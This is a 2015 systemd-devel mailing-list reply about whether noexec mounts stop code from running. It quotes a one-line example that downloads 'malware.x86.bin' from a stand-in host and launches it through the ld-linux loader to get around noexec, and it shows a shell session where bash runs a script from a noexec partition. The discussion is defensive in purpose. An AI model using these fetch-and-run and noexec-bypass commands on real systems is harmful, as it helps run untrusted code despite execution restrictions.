Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie <simon.mcvit...@collabora.co.uk <mailto:simon.mcvit...@collabora.co.uk>> wrote: wget http://example.com/malware.__x86.bin <http://example.com/malware.x86.bin> /lib/ld-linux.so.2 malware.x86.bin Pretty sure this no longer works; these days noexec prevents mmap(PROT_EXEC) as well
you should not assume when you can try it simplefrankly we mount most data-partitions noexec even if they contain cronjobs which get the full interpreter and the script path by intention
[root@arrakis:~]$ mount | grep dune/dev/sdf1 on /Volumes/dune type ext4 (rw,noexec,noatime,nodiratime,commit=30,inode_readahead_blks=16)
[root@arrakis:~]$ touch /Volumes/dune/test.sh [root@arrakis:~]$ echo "ls /boot/" > /Volumes/dune/test.sh [root@arrakis:~]$ bash /Volumes/dune/test.shconfig-3.18.7-100.fc20.x86_64 grub2 initramfs-3.18.7-100.fc20.x86_64.img initrd-plymouth.img lost+found System.map-3.18.7-100.fc20.x86_64 vmlinuz-3.18.7-100.fc20.x86_64
signature.asc
Description: OpenPGP digital signature
_______________________________________________ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel